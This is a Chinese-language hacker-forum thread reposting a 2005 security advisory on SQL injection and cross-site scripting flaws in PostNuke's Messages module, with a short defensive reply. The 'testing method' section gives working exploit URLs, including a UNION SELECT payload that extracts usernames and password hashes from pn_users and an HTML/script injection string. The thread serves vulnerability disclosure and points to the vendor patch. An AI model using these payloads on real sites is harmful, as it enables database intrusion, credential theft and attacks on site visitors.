Board logo

标题: [转帖]PostNuke SQL注入和跨站脚本漏洞 [打印本页]

作者: 久木    时间: 2005-6-1 02:39     标题: [转帖]PostNuke SQL注入和跨站脚本漏洞

来源:绿盟科技 发布日期:2005-05-30 更新日期:2005-05-30 受影响系统: PostNuke PostNuke 0.76 RC4a PostNuke PostNuke 0.76 RC4 PostNuke PostNuke 0.750 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 13789 PostNuke是开放源码,开放开发的内容管理系统(CMS)。 PostNuke中存在SQL注入和跨站脚本漏洞,影响Messages模块,可能允许攻击者修改SQL请求的逻辑,在用户浏览器上执行任意HTML和脚本代码。 PostNuke的readmsg.php脚本没有充分过滤start参数值,攻击者可以提交恶意SQL命令作为此参数数据,导致更改原来的SQL逻辑,可造成数据库更改或信息泄露。 <*来源:sp3x (sp3x@securityreason.com) 链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111721364707520&w=2 *> 测试方法: -------------------------------------------------------------------------------- 警 告 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! /modules/Messages/readpmsg.php ======================= $sql = "SELECT $column[msg_id] AS \"msg_id\", $column[msg_image] AS \"msg_image\", $column[subject] AS \"subject\", $column[from_userid] AS \"from_userid\", $column[to_userid] AS \"to_userid\", $column[msg_time] AS \"msg_time\", $column[msg_text] AS \"msg_text\", $column[read_msg] AS \"read_msg\" FROM $pntable[priv_msgs] WHERE $column[to_userid]=';" . (int)pnVarPrepForStore($userdata) . "';"; $resultID =& $dbconn->SelectLimit($sql,1,$start); if($dbconn->ErrorNo()<>0) { error_log("DB Error: " . $dbconn->ErrorMsg()); echo $dbconn->ErrorMsg() . "
"; forumerror(0005); } ======================= 首先登陆到postnuke,然后向自己发送消息,之后: http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0[SQL inj]&total_messages=1 注意: ------ total_messages=1 - total_messages的ID必须存在。 之后就可以看到以下错误消息: error message : --------------- ======================== You have an error in your SQL syntax; check the manual that corresponds to your MySQL \ server version for the right syntax to use near ';[SQL injection],1'; at line 10 \ ======================== SQL注入攻击: ======================= http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null%20FROM%20pn_users%20WHERE%20pn_uid=2/*&total_messages=1 跨站脚本攻击: ============================ http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0';<;h1>cXIb8O3 and sp3x - SecurityReason&total_messages=1 然后就可以得到: error message : --------------- ======================== You have an error in your SQL syntax; check the manual that corresponds to your MySQL \ server version for the right syntax to use near ';';[Our XSS],1'; at line 10 \ ======================== 建议: -------------------------------------------------------------------------------- 厂商补丁: PostNuke -------- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html
作者: 坏的刚刚好    时间: 2005-6-4 20:33     标题: [转帖]PostNuke SQL注入和跨站脚本漏洞

最重要还是要及早做好防范~




欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/) Powered by Discuz! 7.2